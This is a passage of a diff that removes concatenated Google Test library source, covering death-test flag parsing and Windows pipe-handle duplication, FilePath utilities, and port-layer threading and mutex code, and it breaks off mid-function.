-    *test = new ExecDeathTest(statement, regex, file, line);
-  } else if (GTEST_FLAG(death_test_style) == "fast") {
-    *test = new NoExecDeathTest(statement, regex);
-  }
-
-# endif  // GTEST_OS_WINDOWS
-
-  else {  // NOLINT - this is more readable than unbalanced brackets inside #if.
-    DeathTest::set_last_death_test_message(
-        "Unknown death test style \"" + GTEST_FLAG(death_test_style)
-        + "\" encountered");
-    return false;
-  }
-
-  return true;
-}
-
-// Splits a given string on a given delimiter, populating a given
-// vector with the fields.  GTEST_HAS_DEATH_TEST implies that we have
-// ::std::string, so we can use it here.
-static void SplitString(const ::std::string& str, char delimiter,
-                        ::std::vector< ::std::string>* dest) {
-  ::std::vector< ::std::string> parsed;
-  ::std::string::size_type pos = 0;
-  while (::testing::internal::AlwaysTrue()) {
-    const ::std::string::size_type colon = str.find(delimiter, pos);
-    if (colon == ::std::string::npos) {
-      parsed.push_back(str.substr(pos));
-      break;
-    } else {
-      parsed.push_back(str.substr(pos, colon - pos));
-      pos = colon + 1;
-    }
-  }
-  dest->swap(parsed);
-}
-
-# if GTEST_OS_WINDOWS
-// Recreates the pipe and event handles from the provided parameters,
-// signals the event, and returns a file descriptor wrapped around the pipe
-// handle. This function is called in the child process only.
-int GetStatusFileDescriptor(unsigned int parent_process_id,
-                            size_t write_handle_as_size_t,
-                            size_t event_handle_as_size_t) {
-  AutoHandle parent_process_handle(::OpenProcess(PROCESS_DUP_HANDLE,
-                                                   FALSE,  // Non-inheritable.
-                                                   parent_process_id));
-  if (parent_process_handle.Get() == INVALID_HANDLE_VALUE) {
-    DeathTestAbort("Unable to open parent process " +
-                   StreamableToString(parent_process_id));
-  }
-
-  // TODO(vladl@google.com): Replace the following check with a
-  // compile-time assertion when available.
-  GTEST_CHECK_(sizeof(HANDLE) <= sizeof(size_t));
-
-  const HANDLE write_handle =
-      reinterpret_cast<HANDLE>(write_handle_as_size_t);
-  HANDLE dup_write_handle;
-
-  // The newly initialized handle is accessible only in in the parent
-  // process. To obtain one accessible within the child, we need to use
-  // DuplicateHandle.
-  if (!::DuplicateHandle(parent_process_handle.Get(), write_handle,
-                         ::GetCurrentProcess(), &dup_write_handle,
-                         0x0,    // Requested privileges ignored since
-                                 // DUPLICATE_SAME_ACCESS is used.
-                         FALSE,  // Request non-inheritable handler.
-                         DUPLICATE_SAME_ACCESS)) {
-    DeathTestAbort("Unable to duplicate the pipe handle " +
-                   StreamableToString(write_handle_as_size_t) +
-                   " from the parent process " +
-                   StreamableToString(parent_process_id));
-  }
-
-  const HANDLE event_handle = reinterpret_cast<HANDLE>(event_handle_as_size_t);
-  HANDLE dup_event_handle;
-
-  if (!::DuplicateHandle(parent_process_handle.Get(), event_handle,
-                         ::GetCurrentProcess(), &dup_event_handle,
-                         0x0,
-                         FALSE,
-                         DUPLICATE_SAME_ACCESS)) {
-    DeathTestAbort("Unable to duplicate the event handle " +
-                   StreamableToString(event_handle_as_size_t) +
-                   " from the parent process " +
-                   StreamableToString(parent_process_id));
-  }
-
-  const int write_fd =
-      ::_open_osfhandle(reinterpret_cast<intptr_t>(dup_write_handle), O_APPEND);
-  if (write_fd == -1) {
-    DeathTestAbort("Unable to convert pipe handle " +
-                   StreamableToString(write_handle_as_size_t) +
-                   " to a file descriptor");
-  }
-
-  // Signals the parent that the write end of the pipe has been acquired
-  // so the parent can release its own write end.
-  ::SetEvent(dup_event_handle);
-
-  return write_fd;
-}
-# endif  // GTEST_OS_WINDOWS
-
-// Returns a newly created InternalRunDeathTestFlag object with fields
-// initialized from the GTEST_FLAG(internal_run_death_test) flag if
-// the flag is specified; otherwise returns NULL.
-InternalRunDeathTestFlag* ParseInternalRunDeathTestFlag() {
-  if (GTEST_FLAG(internal_run_death_test) == "") return NULL;
-
-  // GTEST_HAS_DEATH_TEST implies that we have ::std::string, so we
-  // can use it here.
-  int line = -1;
-  int index = -1;
-  ::std::vector< ::std::string> fields;
-  SplitString(GTEST_FLAG(internal_run_death_test).c_str(), '|', &fields);
-  int write_fd = -1;
-
-# if GTEST_OS_WINDOWS
-
-  unsigned int parent_process_id = 0;
-  size_t write_handle_as_size_t = 0;
-  size_t event_handle_as_size_t = 0;
-
-  if (fields.size() != 6
-      || !ParseNaturalNumber(fields[1], &line)
-      || !ParseNaturalNumber(fields[2], &index)
-      || !ParseNaturalNumber(fields[3], &parent_process_id)
-      || !ParseNaturalNumber(fields[4], &write_handle_as_size_t)
-      || !ParseNaturalNumber(fields[5], &event_handle_as_size_t)) {
-    DeathTestAbort("Bad --gtest_internal_run_death_test flag: " +
-                   GTEST_FLAG(internal_run_death_test));
-  }
-  write_fd = GetStatusFileDescriptor(parent_process_id,
-                                     write_handle_as_size_t,
-                                     event_handle_as_size_t);
-# else
-
-  if (fields.size() != 4
-      || !ParseNaturalNumber(fields[1], &line)
-      || !ParseNaturalNumber(fields[2], &index)
-      || !ParseNaturalNumber(fields[3], &write_fd)) {
-    DeathTestAbort("Bad --gtest_internal_run_death_test flag: "
-        + GTEST_FLAG(internal_run_death_test));
-  }
-
-# endif  // GTEST_OS_WINDOWS
-
-  return new InternalRunDeathTestFlag(fields[0], line, index, write_fd);
-}
-
-}  // namespace internal
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-}  // namespace testing
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: keith.ray@gmail.com (Keith Ray)
-
-
-#include <stdlib.h>
-
-#if GTEST_OS_WINDOWS_MOBILE
-# include <windows.h>
-#elif GTEST_OS_WINDOWS
-# include <direct.h>
-# include <io.h>
-#elif GTEST_OS_SYMBIAN
-// Symbian OpenC has PATH_MAX in sys/syslimits.h
-# include <sys/syslimits.h>
-#else
-# include <limits.h>
-# include <climits>  // Some Linux distributions define PATH_MAX here.
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-#if GTEST_OS_WINDOWS
-# define GTEST_PATH_MAX_ _MAX_PATH
-#elif defined(PATH_MAX)
-# define GTEST_PATH_MAX_ PATH_MAX
-#elif defined(_XOPEN_PATH_MAX)
-# define GTEST_PATH_MAX_ _XOPEN_PATH_MAX
-#else
-# define GTEST_PATH_MAX_ _POSIX_PATH_MAX
-#endif  // GTEST_OS_WINDOWS
-
-
-namespace testing {
-namespace internal {
-
-#if GTEST_OS_WINDOWS
-// On Windows, '\\' is the standard path separator, but many tools and the
-// Windows API also accept '/' as an alternate path separator. Unless otherwise
-// noted, a file path can contain either kind of path separators, or a mixture
-// of them.
-const char kPathSeparator = '\\';
-const char kAlternatePathSeparator = '/';
-const char kAlternatePathSeparatorString[] = "/";
-# if GTEST_OS_WINDOWS_MOBILE
-// Windows CE doesn't have a current directory. You should not use
-// the current directory in tests on Windows CE, but this at least
-// provides a reasonable fallback.
-const char kCurrentDirectoryString[] = "\\";
-// Windows CE doesn't define INVALID_FILE_ATTRIBUTES
-const DWORD kInvalidFileAttributes = 0xffffffff;
-# else
-const char kCurrentDirectoryString[] = ".\\";
-# endif  // GTEST_OS_WINDOWS_MOBILE
-#else
-const char kPathSeparator = '/';
-const char kCurrentDirectoryString[] = "./";
-#endif  // GTEST_OS_WINDOWS
-
-// Returns whether the given character is a valid path separator.
-static bool IsPathSeparator(char c) {
-#if GTEST_HAS_ALT_PATH_SEP_
-  return (c == kPathSeparator) || (c == kAlternatePathSeparator);
-#else
-  return c == kPathSeparator;
-#endif
-}
-
-// Returns the current working directory, or "" if unsuccessful.
-FilePath FilePath::GetCurrentDir() {
-#if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_WINDOWS_PHONE || GTEST_OS_WINDOWS_RT
-  // Windows CE doesn't have a current directory, so we just return
-  // something reasonable.
-  return FilePath(kCurrentDirectoryString);
-#elif GTEST_OS_WINDOWS
-  char cwd[GTEST_PATH_MAX_ + 1] = { '\0' };
-  return FilePath(_getcwd(cwd, sizeof(cwd)) == NULL ? "" : cwd);
-#else
-  char cwd[GTEST_PATH_MAX_ + 1] = { '\0' };
-  char* result = getcwd(cwd, sizeof(cwd));
-# if GTEST_OS_NACL
-  // getcwd will likely fail in NaCl due to the sandbox, so return something
-  // reasonable. The user may have provided a shim implementation for getcwd,
-  // however, so fallback only when failure is detected.
-  return FilePath(result == NULL ? kCurrentDirectoryString : cwd);
-# endif  // GTEST_OS_NACL
-  return FilePath(result == NULL ? "" : cwd);
-#endif  // GTEST_OS_WINDOWS_MOBILE
-}
-
-// Returns a copy of the FilePath with the case-insensitive extension removed.
-// Example: FilePath("dir/file.exe").RemoveExtension("EXE") returns
-// FilePath("dir/file"). If a case-insensitive extension is not
-// found, returns a copy of the original FilePath.
-FilePath FilePath::RemoveExtension(const char* extension) const {
-  const std::string dot_extension = std::string(".") + extension;
-  if (String::EndsWithCaseInsensitive(pathname_, dot_extension)) {
-    return FilePath(pathname_.substr(
-        0, pathname_.length() - dot_extension.length()));
-  }
-  return *this;
-}
-
-// Returns a pointer to the last occurrence of a valid path separator in
-// the FilePath. On Windows, for example, both '/' and '\' are valid path
-// separators. Returns NULL if no path separator was found.
-const char* FilePath::FindLastPathSeparator() const {
-  const char* const last_sep = strrchr(c_str(), kPathSeparator);
-#if GTEST_HAS_ALT_PATH_SEP_
-  const char* const last_alt_sep = strrchr(c_str(), kAlternatePathSeparator);
-  // Comparing two pointers of which only one is NULL is undefined.
-  if (last_alt_sep != NULL &&
-      (last_sep == NULL || last_alt_sep > last_sep)) {
-    return last_alt_sep;
-  }
-#endif
-  return last_sep;
-}
-
-// Returns a copy of the FilePath with the directory part removed.
-// Example: FilePath("path/to/file").RemoveDirectoryName() returns
-// FilePath("file"). If there is no directory part ("just_a_file"), it returns
-// the FilePath unmodified. If there is no file part ("just_a_dir/") it
-// returns an empty FilePath ("").
-// On Windows platform, '\' is the path separator, otherwise it is '/'.
-FilePath FilePath::RemoveDirectoryName() const {
-  const char* const last_sep = FindLastPathSeparator();
-  return last_sep ? FilePath(last_sep + 1) : *this;
-}
-
-// RemoveFileName returns the directory path with the filename removed.
-// Example: FilePath("path/to/file").RemoveFileName() returns "path/to/".
-// If the FilePath is "a_file" or "/a_file", RemoveFileName returns
-// FilePath("./") or, on Windows, FilePath(".\\"). If the filepath does
-// not have a file, like "just/a/dir/", it returns the FilePath unmodified.
-// On Windows platform, '\' is the path separator, otherwise it is '/'.
-FilePath FilePath::RemoveFileName() const {
-  const char* const last_sep = FindLastPathSeparator();
-  std::string dir;
-  if (last_sep) {
-    dir = std::string(c_str(), last_sep + 1 - c_str());
-  } else {
-    dir = kCurrentDirectoryString;
-  }
-  return FilePath(dir);
-}
-
-// Helper functions for naming files in a directory for xml output.
-
-// Given directory = "dir", base_name = "test", number = 0,
-// extension = "xml", returns "dir/test.xml". If number is greater
-// than zero (e.g., 12), returns "dir/test_12.xml".
-// On Windows platform, uses \ as the separator rather than /.
-FilePath FilePath::MakeFileName(const FilePath& directory,
-                                const FilePath& base_name,
-                                int number,
-                                const char* extension) {
-  std::string file;
-  if (number == 0) {
-    file = base_name.string() + "." + extension;
-  } else {
-    file = base_name.string() + "_" + StreamableToString(number)
-        + "." + extension;
-  }
-  return ConcatPaths(directory, FilePath(file));
-}
-
-// Given directory = "dir", relative_path = "test.xml", returns "dir/test.xml".
-// On Windows, uses \ as the separator rather than /.
-FilePath FilePath::ConcatPaths(const FilePath& directory,
-                               const FilePath& relative_path) {
-  if (directory.IsEmpty())
-    return relative_path;
-  const FilePath dir(directory.RemoveTrailingPathSeparator());
-  return FilePath(dir.string() + kPathSeparator + relative_path.string());
-}
-
-// Returns true if pathname describes something findable in the file-system,
-// either a file, directory, or whatever.
-bool FilePath::FileOrDirectoryExists() const {
-#if GTEST_OS_WINDOWS_MOBILE
-  LPCWSTR unicode = String::AnsiToUtf16(pathname_.c_str());
-  const DWORD attributes = GetFileAttributes(unicode);
-  delete [] unicode;
-  return attributes != kInvalidFileAttributes;
-#else
-  posix::StatStruct file_stat;
-  return posix::Stat(pathname_.c_str(), &file_stat) == 0;
-#endif  // GTEST_OS_WINDOWS_MOBILE
-}
-
-// Returns true if pathname describes a directory in the file-system
-// that exists.
-bool FilePath::DirectoryExists() const {
-  bool result = false;
-#if GTEST_OS_WINDOWS
-  // Don't strip off trailing separator if path is a root directory on
-  // Windows (like "C:\\").
-  const FilePath& path(IsRootDirectory() ? *this :
-                                           RemoveTrailingPathSeparator());
-#else
-  const FilePath& path(*this);
-#endif
-
-#if GTEST_OS_WINDOWS_MOBILE
-  LPCWSTR unicode = String::AnsiToUtf16(path.c_str());
-  const DWORD attributes = GetFileAttributes(unicode);
-  delete [] unicode;
-  if ((attributes != kInvalidFileAttributes) &&
-      (attributes & FILE_ATTRIBUTE_DIRECTORY)) {
-    result = true;
-  }
-#else
-  posix::StatStruct file_stat;
-  result = posix::Stat(path.c_str(), &file_stat) == 0 &&
-      posix::IsDir(file_stat);
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-  return result;
-}
-
-// Returns true if pathname describes a root directory. (Windows has one
-// root directory per disk drive.)
-bool FilePath::IsRootDirectory() const {
-#if GTEST_OS_WINDOWS
-  // TODO(wan@google.com): on Windows a network share like
-  // \\server\share can be a root directory, although it cannot be the
-  // current directory.  Handle this properly.
-  return pathname_.length() == 3 && IsAbsolutePath();
-#else
-  return pathname_.length() == 1 && IsPathSeparator(pathname_.c_str()[0]);
-#endif
-}
-
-// Returns true if pathname describes an absolute path.
-bool FilePath::IsAbsolutePath() const {
-  const char* const name = pathname_.c_str();
-#if GTEST_OS_WINDOWS
-  return pathname_.length() >= 3 &&
-     ((name[0] >= 'a' && name[0] <= 'z') ||
-      (name[0] >= 'A' && name[0] <= 'Z')) &&
-     name[1] == ':' &&
-     IsPathSeparator(name[2]);
-#else
-  return IsPathSeparator(name[0]);
-#endif
-}
-
-// Returns a pathname for a file that does not currently exist. The pathname
-// will be directory/base_name.extension or
-// directory/base_name_<number>.extension if directory/base_name.extension
-// already exists. The number will be incremented until a pathname is found
-// that does not already exist.
-// Examples: 'dir/foo_test.xml' or 'dir/foo_test_1.xml'.
-// There could be a race condition if two or more processes are calling this
-// function at the same time -- they could both pick the same filename.
-FilePath FilePath::GenerateUniqueFileName(const FilePath& directory,
-                                          const FilePath& base_name,
-                                          const char* extension) {
-  FilePath full_pathname;
-  int number = 0;
-  do {
-    full_pathname.Set(MakeFileName(directory, base_name, number++, extension));
-  } while (full_pathname.FileOrDirectoryExists());
-  return full_pathname;
-}
-
-// Returns true if FilePath ends with a path separator, which indicates that
-// it is intended to represent a directory. Returns false otherwise.
-// This does NOT check that a directory (or file) actually exists.
-bool FilePath::IsDirectory() const {
-  return !pathname_.empty() &&
-         IsPathSeparator(pathname_.c_str()[pathname_.length() - 1]);
-}
-
-// Create directories so that path exists. Returns true if successful or if
-// the directories already exist; returns false if unable to create directories
-// for any reason.
-bool FilePath::CreateDirectoriesRecursively() const {
-  if (!this->IsDirectory()) {
-    return false;
-  }
-
-  if (pathname_.length() == 0 || this->DirectoryExists()) {
-    return true;
-  }
-
-  const FilePath parent(this->RemoveTrailingPathSeparator().RemoveFileName());
-  return parent.CreateDirectoriesRecursively() && this->CreateFolder();
-}
-
-// Create the directory so that path exists. Returns true if successful or
-// if the directory already exists; returns false if unable to create the
-// directory for any reason, including if the parent directory does not
-// exist. Not named "CreateDirectory" because that's a macro on Windows.
-bool FilePath::CreateFolder() const {
-#if GTEST_OS_WINDOWS_MOBILE
-  FilePath removed_sep(this->RemoveTrailingPathSeparator());
-  LPCWSTR unicode = String::AnsiToUtf16(removed_sep.c_str());
-  int result = CreateDirectory(unicode, NULL) ? 0 : -1;
-  delete [] unicode;
-#elif GTEST_OS_WINDOWS
-  int result = _mkdir(pathname_.c_str());
-#else
-  int result = mkdir(pathname_.c_str(), 0777);
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-  if (result == -1) {
-    return this->DirectoryExists();  // An error is OK if the directory exists.
-  }
-  return true;  // No error.
-}
-
-// If input name has a trailing separator character, remove it and return the
-// name, otherwise return the name string unmodified.
-// On Windows platform, uses \ as the separator, other platforms use /.
-FilePath FilePath::RemoveTrailingPathSeparator() const {
-  return IsDirectory()
-      ? FilePath(pathname_.substr(0, pathname_.length() - 1))
-      : *this;
-}
-
-// Removes any redundant separators that might be in the pathname.
-// For example, "bar///foo" becomes "bar/foo". Does not eliminate other
-// redundancies that might be in a pathname involving "." or "..".
-// TODO(wan@google.com): handle Windows network shares (e.g. \\server\share).
-void FilePath::Normalize() {
-  if (pathname_.c_str() == NULL) {
-    pathname_ = "";
-    return;
-  }
-  const char* src = pathname_.c_str();
-  char* const dest = new char[pathname_.length() + 1];
-  char* dest_ptr = dest;
-  memset(dest_ptr, 0, pathname_.length() + 1);
-
-  while (*src != '\0') {
-    *dest_ptr = *src;
-    if (!IsPathSeparator(*src)) {
-      src++;
-    } else {
-#if GTEST_HAS_ALT_PATH_SEP_
-      if (*dest_ptr == kAlternatePathSeparator) {
-        *dest_ptr = kPathSeparator;
-      }
-#endif
-      while (IsPathSeparator(*src))
-        src++;
-    }
-    dest_ptr++;
-  }
-  *dest_ptr = '\0';
-  pathname_ = dest;
-  delete[] dest;
-}
-
-}  // namespace internal
-}  // namespace testing
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-
-#include <limits.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-#if GTEST_OS_WINDOWS
-# include <windows.h>
-# include <io.h>
-# include <sys/stat.h>
-# include <map>  // Used in ThreadLocal.
-#else
-# include <unistd.h>
-#endif  // GTEST_OS_WINDOWS
-
-#if GTEST_OS_MAC
-# include <mach/mach_init.h>
-# include <mach/task.h>
-# include <mach/vm_map.h>
-#endif  // GTEST_OS_MAC
-
-#if GTEST_OS_QNX
-# include <devctl.h>
-# include <fcntl.h>
-# include <sys/procfs.h>
-#endif  // GTEST_OS_QNX
-
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick exists to
-// prevent the accidental inclusion of gtest-internal-inl.h in the
-// user's code.
-#define GTEST_IMPLEMENTATION_ 1
-#undef GTEST_IMPLEMENTATION_
-
-namespace testing {
-namespace internal {
-
-#if defined(_MSC_VER) || defined(__BORLANDC__)
-// MSVC and C++Builder do not provide a definition of STDERR_FILENO.
-const int kStdOutFileno = 1;
-const int kStdErrFileno = 2;
-#else
-const int kStdOutFileno = STDOUT_FILENO;
-const int kStdErrFileno = STDERR_FILENO;
-#endif  // _MSC_VER
-
-#if GTEST_OS_MAC
-
-// Returns the number of threads running in the process, or 0 to indicate that
-// we cannot detect it.
-size_t GetThreadCount() {
-  const task_t task = mach_task_self();
-  mach_msg_type_number_t thread_count;
-  thread_act_array_t thread_list;
-  const kern_return_t status = task_threads(task, &thread_list, &thread_count);
-  if (status == KERN_SUCCESS) {
-    // task_threads allocates resources in thread_list and we need to free them
-    // to avoid leaks.
-    vm_deallocate(task,
-                  reinterpret_cast<vm_address_t>(thread_list),
-                  sizeof(thread_t) * thread_count);
-    return static_cast<size_t>(thread_count);
-  } else {
-    return 0;
-  }
-}
-
-#elif GTEST_OS_QNX
-
-// Returns the number of threads running in the process, or 0 to indicate that
-// we cannot detect it.
-size_t GetThreadCount() {
-  const int fd = open("/proc/self/as", O_RDONLY);
-  if (fd < 0) {
-    return 0;
-  }
-  procfs_info process_info;
-  const int status =
-      devctl(fd, DCMD_PROC_INFO, &process_info, sizeof(process_info), NULL);
-  close(fd);
-  if (status == EOK) {
-    return static_cast<size_t>(process_info.num_threads);
-  } else {
-    return 0;
-  }
-}
-
-#else
-
-size_t GetThreadCount() {
-  // There's no portable way to detect the number of threads, so we just
-  // return 0 to indicate that we cannot detect it.
-  return 0;
-}
-
-#endif  // GTEST_OS_MAC
-
-#if GTEST_IS_THREADSAFE && GTEST_OS_WINDOWS
-
-void SleepMilliseconds(int n) {
-  ::Sleep(n);
-}
-
-AutoHandle::AutoHandle()
-    : handle_(INVALID_HANDLE_VALUE) {}
-
-AutoHandle::AutoHandle(Handle handle)
-    : handle_(handle) {}
-
-AutoHandle::~AutoHandle() {
-  Reset();
-}
-
-AutoHandle::Handle AutoHandle::Get() const {
-  return handle_;
-}
-
-void AutoHandle::Reset() {
-  Reset(INVALID_HANDLE_VALUE);
-}
-
-void AutoHandle::Reset(HANDLE handle) {
-  // Resetting with the same handle we already own is invalid.
-  if (handle_ != handle) {
-    if (IsCloseable()) {
-      ::CloseHandle(handle_);
-    }
-    handle_ = handle;
-  } else {
-    GTEST_CHECK_(!IsCloseable())
-        << "Resetting a valid handle to itself is likely a programmer error "
-            "and thus not allowed.";
-  }
-}
-
-bool AutoHandle::IsCloseable() const {
-  // Different Windows APIs may use either of these values to represent an
-  // invalid handle.
-  return handle_ != NULL && handle_ != INVALID_HANDLE_VALUE;
-}
-
-Notification::Notification()
-    : event_(::CreateEvent(NULL,   // Default security attributes.
-                           TRUE,   // Do not reset automatically.
-                           FALSE,  // Initially unset.
-                           NULL)) {  // Anonymous event.
-  GTEST_CHECK_(event_.Get() != NULL);
-}
-
-void Notification::Notify() {
-  GTEST_CHECK_(::SetEvent(event_.Get()) != FALSE);
-}
-
-void Notification::WaitForNotification() {
-  GTEST_CHECK_(
-      ::WaitForSingleObject(event_.Get(), INFINITE) == WAIT_OBJECT_0);
-}
-
-Mutex::Mutex()
-    : owner_thread_id_(0),
-      type_(kDynamic),
-      critical_section_init_phase_(0),
-      critical_section_(new CRITICAL_SECTION) {
-  ::InitializeCriticalSection(critical_section_);
-}
-
-Mutex::~Mutex() {
-  // Static mutexes are leaked intentionally. It is not thread-safe to try
-  // to clean them up.
-  // TODO(yukawa): Switch to Slim Reader/Writer (SRW) Locks, which requires
-  // nothing to clean it up but is available only on Vista and later.
-  // http://msdn.microsoft.com/en-us/library/windows/desktop/aa904937.aspx
-  if (type_ == kDynamic) {
-    ::DeleteCriticalSection(critical_section_);
-    delete critical_section_;
-    critical_section_ = NULL;
-  }
-}
-
-void Mutex::Lock() {
-  ThreadSafeLazyInit();
-  ::EnterCriticalSection(critical_section_);
-  owner_thread_id_ = ::GetCurrentThreadId();
-}
-
-void Mutex::Unlock() {
-  ThreadSafeLazyInit();
-  // We don't protect writing to owner_thread_id_ here, as it's the
-  // caller's responsibility to ensure that the current thread holds the
-  // mutex when this is called.
-  owner_thread_id_ = 0;
-  ::LeaveCriticalSection(critical_section_);
-}
-
-// Does nothing if the current thread holds the mutex. Otherwise, crashes
-// with high probability.
-void Mutex::AssertHeld() {
-  ThreadSafeLazyInit();
-  GTEST_CHECK_(owner_thread_id_ == ::GetCurrentThreadId())
-      << "The current thread is not holding the mutex @" << this;
-}
-
-// Initializes owner_thread_id_ and critical_section_ in static mutexes.
-void Mutex::ThreadSafeLazyInit() {
-  // Dynamic mutexes are initialized in the constructor.
-  if (type_ == kStatic) {
-    switch (
-        ::InterlockedCompareExchange(&critical_section_init_phase_, 1L, 0L)) {
-      case 0:
-        // If critical_section_init_phase_ was 0 before the exchange, we
-        // are the first to test it and need to perform the initialization.
-        owner_thread_id_ = 0;
-        critical_section_ = new CRITICAL_SECTION;
-        ::InitializeCriticalSection(critical_section_);
-        // Updates the critical_section_init_phase_ to 2 to signal
-        // initialization complete.
-        GTEST_CHECK_(::InterlockedCompareExchange(
-                          &critical_section_init_phase_, 2L, 1L) ==
-                      1L);
-        break;
-      case 1:
-        // Somebody else is already initializing the mutex; spin until they
-        // are done.
-        while (::InterlockedCompareExchange(&critical_section_init_phase_,
-                                            2L,
-                                            2L) != 2L) {
-          // Possibly yields the rest of the thread's time slice to other
-          // threads.
-          ::Sleep(0);
-        }
-        break;
-
-      case 2:
-        break;  // The mutex is already initialized and ready for use.
-
-      default:
-        GTEST_CHECK_(false)
-            << "Unexpected value of critical_section_init_phase_ "
-            << "while initializing a static mutex.";
-    }
-  }
-}
-
-namespace {
-
-class ThreadWithParamSupport : public ThreadWithParamBase {
- public:
-  static HANDLE CreateThread(Runnable* runnable,
-                             Notification* thread_can_start) {
-    ThreadMainParam* param = new ThreadMainParam(runnable, thread_can_start);
-    DWORD thread_id;
-    // TODO(yukawa): Consider to use _beginthreadex instead.
-    HANDLE thread_handle = ::CreateThread(
-        NULL,    // Default security.
-        0,       // Default stack size.
-        &ThreadWithParamSupport::ThreadMain,
-        param,   // Parameter to ThreadMainStatic
-        0x0,     // Default creation flags.
-        &thread_id);  // Need a valid pointer for the call to work under Win98.
-    GTEST_CHECK_(thread_handle != NULL) << "CreateThread failed with error "
-                                        << ::GetLastError() << ".";
-    if (thread_handle == NULL) {
-      delete param;
-    }
-    return thread_handle;
-  }
-
- private:
-  struct ThreadMainParam {
-    ThreadMainParam(Runnable* runnable, Notification* thread_can_start)
-        : runnable_(runnable),
-          thread_can_start_(thread_can_start) {
-    }
-    scoped_ptr<Runnable> runnable_;
-    // Does not own.
-    Notification* thread_can_start_;
-  };
-
-  static DWORD WINAPI ThreadMain(void* ptr) {
-    // Transfers ownership.
-    scoped_ptr<ThreadMainParam> param(static_cast<ThreadMainParam*>(ptr));
-    if (param->thread_can_start_ != NULL)
-      param->thread_can_start_->WaitForNotification();
-    param->runnable_->Run();
-    return 0;
-  }
-
-  // Prohibit instantiation.
-  ThreadWithParamSupport();
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadWithParamSupport);
-};
-
-}  // namespace
-
-ThreadWithParamBase::ThreadWithParamBase(Runnable *runnable,
-                                         Notification* thread_can_start)
-      : thread_(ThreadWithParamSupport::CreateThread(runnable,
-                                                     thread_can_start)) {
-}
-
-ThreadWithParamBase::~ThreadWithParamBase() {
-  Join();
-}
-
-void ThreadWithParamBase::Join() {
-  GTEST_CHECK_(::WaitForSingleObject(thread_.Get(), INFINITE) == WAIT_OBJECT_0)
-      << "Failed to join the thread with error " << ::GetLastError() << ".";
-}
-
-// Maps a thread to a set of ThreadIdToThreadLocals that have values
-// instantiated on that thread and notifies them when the thread exits.  A
-// ThreadLocal instance is expected to persist until all threads it has
-// values on have terminated.
-class ThreadLocalRegistryImpl {
- public:
-  // Registers thread_local_instance as having value on the current thread.
-  // Returns a value that can be used to identify the thread from other threads.
-  static ThreadLocalValueHolderBase* GetValueOnCurrentThread(
-      const ThreadLocalBase* thread_local_instance) {
-    DWORD current_thread = ::GetCurrentThreadId();
-    MutexLock lock(&mutex_);
-    ThreadIdToThreadLocals* const thread_to_thread_locals =
-        GetThreadLocalsMapLocked();
-    ThreadIdToThreadLocals::iterator thread_local_pos =
-        thread_to_thread_locals->find(current_thread);
-    if (thread_local_pos == thread_to_thread_locals->end()) {
-      thread_local_pos = thread_to_thread_locals->insert(
